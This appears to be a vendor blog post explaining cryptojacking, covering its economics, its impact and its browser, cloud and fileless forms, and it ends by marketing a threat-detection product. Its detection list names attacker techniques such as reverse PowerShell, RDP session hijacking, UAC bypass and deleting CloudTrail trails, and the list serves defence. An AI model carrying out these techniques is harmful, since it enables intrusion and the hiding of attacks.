Last year, I wrote that ransomware was the summer anthem of 2017. At the time, it seemed impossible that the onslaught of global ransomware attacks like WannaCry and NotPetya would ever wane. But, I should have known better. Every summertime anthem eventually gets overplayed.
This year, cryptojacking took over the airwaves, fueled by volatile global cryptocurrency markets. In the first half of 2018, detected cryptojacking attacks increased 141%, outpacing ransomware attacks. In this blog post, I’ll address cryptojacking: what it is, how it works, how to detect it, and why you should be tuning into this type of threat.
What is Cryptojacking?
Crytojacking definition: Cryptojacking is the act of using another’s computational resources without their knowledge or permission for cryptomining activities.
By cryptojacking mobile devices, laptops, and servers, attackers effectively steal the CPU of your device to mine for cryptocurrencies like Bitcoin and Monero. Whereas traditional malware attacks target sensitive data that can be exploited for financial gain, like social security numbers and credit card information, cybercriminals that launch cryptojacking campaigns are more interested in your device’s computing power than your own personal data. To understand why, it’s helpful to consider the economics of cryptocurrency mining.
Mining for cryptocurrencies like Bitcoin and Monero takes some serious computing resources to solve the complex algorithms used to discover new coins. These resources are not cheap, as anyone who pays their organization’s AWS bill or data center utility bill can attest to. So, in order for cryptocurrency mining to be profitable and worthwhile, the market value of the cryptocurrency must be higher than the cost of mining it – that is, unless you can eliminate the resource costs altogether by stealing others’ resources to do the mining for you.
That’s exactly what cryptojacking attacks aim to do, to silently turn millions of devices into cryptomining bots, enabling cybercriminals to turn a profit without all the effort and uncertainty of collecting a ransom. Often, cryptojacking attacks are designed to evade detection by traditional antivirus tools so that they can quietly run in the background of the machine.
Does this mean that all cryptomining activity is malicious? Well, it depends on who you ask.
Cryptomining vs. Cryptojacking
As the cryptocurrency markets have gained value and become more mainstream in recent years, we’ve seen a digital gold rush to cryptomine for new Bitcoin, and more recently, Monero. What began with early adopters and hobbyists building home rigs to mine for new coins has now given way to an entire economy of mining as a service, cryptoming server farms, and even cryptomining cafes. In this sense, cryptomining is, more or less, considered a legal and legitimate activity, one that could be further legitimized by a rumored $12 Billion Bitman IPO.
Yet, the lines between cryptomining and cryptojacking are blurry. For example, the cryptomining “startup” Coinhive has positioned its technology as an alternative way to monetize a website, instead of by serving ads or charging a subscription. According to the website, the folks behind Coinhive, “dream about it as an alternative to micropayments, artificial wait time in online games, intrusive ads and dubious marketing tactics.”
Yet at the same time, Coinhive has been one of the most common culprits found in cryptojacking attacks this year. In fact, one recent report analyzed cryptojacking sites and found that nearly 50,000 websites were running cryptocurrency malware, Coinhive among them. Recent Coinhive victims include the Los Angeles Times, Politifact.com, and both AOL and Google’s Ad Networks. Further blurring the lines, Coinhive has been heavily criticized for its handling of (or lack thereof) abuse complaints.
As a result of the dramatic rise in cryptojacking attacks this year, many in the infosec community have come to consider all cryptominers as malware. And, browser developers have started to introduce browser extensions to block cryptomining activities, such as No Coin.
This “trust-no-miner” sentiment is strong in the infosec community. According to our own AlienVault research, only 8% of cybersecurity professionals would consent to their computer being used for cryptomining in exchange for accessing content on a website, although slightly larger group of altruists (38%) would consent if that cryptomining activity benefited a charity.
So, while legitimate cryptomining activities will likely continue to grow as the cryptocurrency markets evolve with investments in large-scale operations, it’s unlikely that cryptomining as a form of micropayment will gain mass adoption any time soon.
Cryptojacking – What’s at Stake?
While a cryptojacking attack might not be as acutely devastating as a ransomware attack, it can cause serious damage to your business. Here’s a list of possible impact a cryptojacking attack can have:
- A slow-loading website: When an attacker exploits a website vulnerability by injecting a cryptomining tool like Coinhive, it can slow down page load time, driving away your visitors, users, or shoppers. Some attacks intentionally add a delay so that they can use more resources while the user waits for the page to load, as seen in the attack against Starbucks’ WiFi network in Buenos Aires cafes.
- High resource costs: If cryptominers persist in your infrastructure, you might unknowingly be footing a higher data center utility bill or cloud services provider bill. Think of it like this: If ransomware were grand theft auto, cryptojacking would be more akin to someone siphoning the gas from your tank little by little. You might not notice it right away, but your more frequent stops at the gas pump would eventually add up. That’s not all. Running CPU and GPU higher for a longer time can accelerate the wear and tear on your hardware, shortening its lifecycle and increasing your hardware costs.
- Data loss: No one wants to wake up to an egregious bill from your cloud services provider because an attacker spun up infinite resources overnight for cryptomining. While many security and IT teams have put in place auto-scaling limits to safeguard against this, some cryptojacking attacks are designed to start deleting existing cloud services when that limit is met.
- Security breach: Attackers are becoming increasingly efficient in their maldoings by packaging multiple attack modules and payloads into a single campaign. A malware campaign might drop a cryptominer packaged alongside a keylogger, backdoor, and other tools and techniques. If you detect cryptomining activities in your environment, don’t assume that the attackers’ intentions are single threaded. Opportunist attackers seeking financial gain will try to maximize their profits, whether by stealing your resources, your data, or both, if you let them.
Explain How Cryptojacking Attacks Work
Cryptojacking attacks take on multiple forms in the wild, often packaged with other modern attack modules found in various malware and ransomware attacks. Here are three common ways we see cryptojacking attacks unfold in the wild:
Browser-based Cryptojacking Attacks
In this common type of cryptojacking attack, an attacker injects a cryptominer into a compromised website, ad platform, or browser extension, often by exploiting cross-site scripting (XSS) vulnerabilities. This enables the cryptominer to use a device’s resources whenever the user browses the website, plays an ad, or installs the malicious browser extension. However, some attacks have been known to persist by launching a separate “pop under” window that hides behind the taskbar clock and continues to mine after the user exits the website.
Cryptojacking the Public Cloud
Public cloud environments provide near-infinite computing resources for an attacker bent on cryptomining. Once an attacker has infiltrated your public cloud environment, they can silently siphon your resources and perhaps delete or flood logs to cover their tracks. Or, more aggressively and with sufficient privileges, the attacker may spin up resources rapidly and programatically while deleting other user accounts in an attempt to lock you out of your account to disrupt the cryptojacking.
Modern attacks against cloud infrastructure use bots to look for easy targets like unsecure servers or account credentials shared in Github. Practicing good cloud security hygiene across your organization is the best first defense to avoid becoming an easy target and an unfortunate headline. Here are a few good resources on cloud security best practices:
- 11 Simple Yet Important Tips to Secure AWS
- AlienVault Best Practices for AWS Security
- AWS Security Best Practices (Amazon)
- Introduction to Azure Security (Microsoft)
Advanced Fileless Malware Attacks
Fileless malware attacks are on the rise this year, and many of the campaigns we’ve observed in the wild include a cryptominer payload. Fileless attacks take advantage of PowerShell, Windows Management Instrumentation (WMI), and other common IT admin tools in order to evade detection by traditional antivirus and signature-based detection tools. For example, the AlienVault Labs Security Research Team recently analyzed MassMiner, noting that it uses PowerShell to download the cryptominer onto infected hosts. As I mentioned above, advanced fileless attacks are increasingly packaged with multiple tools, modules, and payloads into a single campaign.
Detecting modern fileless attacks requires advanced threat hunting capabilities that go well beyond perimeter and endpoint protection tools. You must be able to identify new and evolving tools, tactics, and procedures (TTPs) that attackers employ for exploitation, installation, lateral movement, persistence, and exfiltration. Unless you have dedicated resources to research the latest TTPs found in the wild, hunt for threats, and analyze all the security data from across your environment, it can be a challenge to stay at pace with these types of emerging attacks.
How AlienVault USM Anywhere Detects Cryptojacking
As you can see, there’s no single way that a cryptojacking attack unfolds in the wild. These types of attacks evolve quickly and target critical infrastructure across cloud and on-premises environments. Fortunately, USM Anywhere delivers the capabilities needed to detect and respond quickly to the latest cryptojacking attacks.
In order to detect and defend against cryptojacking attacks, it’s crucial to have visibility of your entire IT environment. USM Anywhere detects modern threats anywhere they appear across your public cloud infrastructure (AWS, Azure); SaaS / cloud apps (Office 365, Oka, G Suite); physical and virtualized on-premises; endpoints (Windows, Linux) on and off the network; even the dark web.
To keep you at pace with the latest cryptojacking attacks without draining your security resources, USM Anywhere automates security monitoring and threat hunting activities.
For example, to detect cryptojacking attacks against your AWS cloud infrastructure, USM Anywhere detects and correlates events like:
- AWS temporary security credentials with long duration
- New user starting a high number of instances
- New user account deleting multiple users
- Multiple instances being started or shut down programmatically
- CloudTrail trails deleted
On endpoints and across your network, USM Anywhere detects and correlates indicators of a cryptojacking attack, including anomalous or suspicious behaviors by normal processes and services. Examples include:
- RDP (remote desktop protocol) Session Hijack using tscon.exe
- Reverse PowerShell use
- A SSH process created a tunnel between two hosts
- Suspicious command executed by a listening process (JBoss, ElasticSearch, Jenkins)
- Windows User Account Control (UAC) Bypass activity detected
- A Docker container recently launched is involved in cryptomining activities.
- Installation of Malicious Chrome Extension
This list of TTPs is continuously and automatically updated in USM Anywhere through the threat intelligence service from the AlienVault Labs Security Research Team. This team uses machine learning capabilities, human intelligence, and the 20 million IOCs shared daily in the Open Threat Exchange (OTX) to identify emerging and evolving TTPs, which they curate and write into actionable correlation rules, endpoint queries, and more. As a result, you get alerts on real high-priority threats as well as response guidance and integrated incident response capabilities – all from a single cloud platform.
There’s much more to discover about USM Anywhere. Start your free 14-day trial to test drive USM Anywhere and see for yourself the powerful threat detection and incident response capabilities built into the unified platform.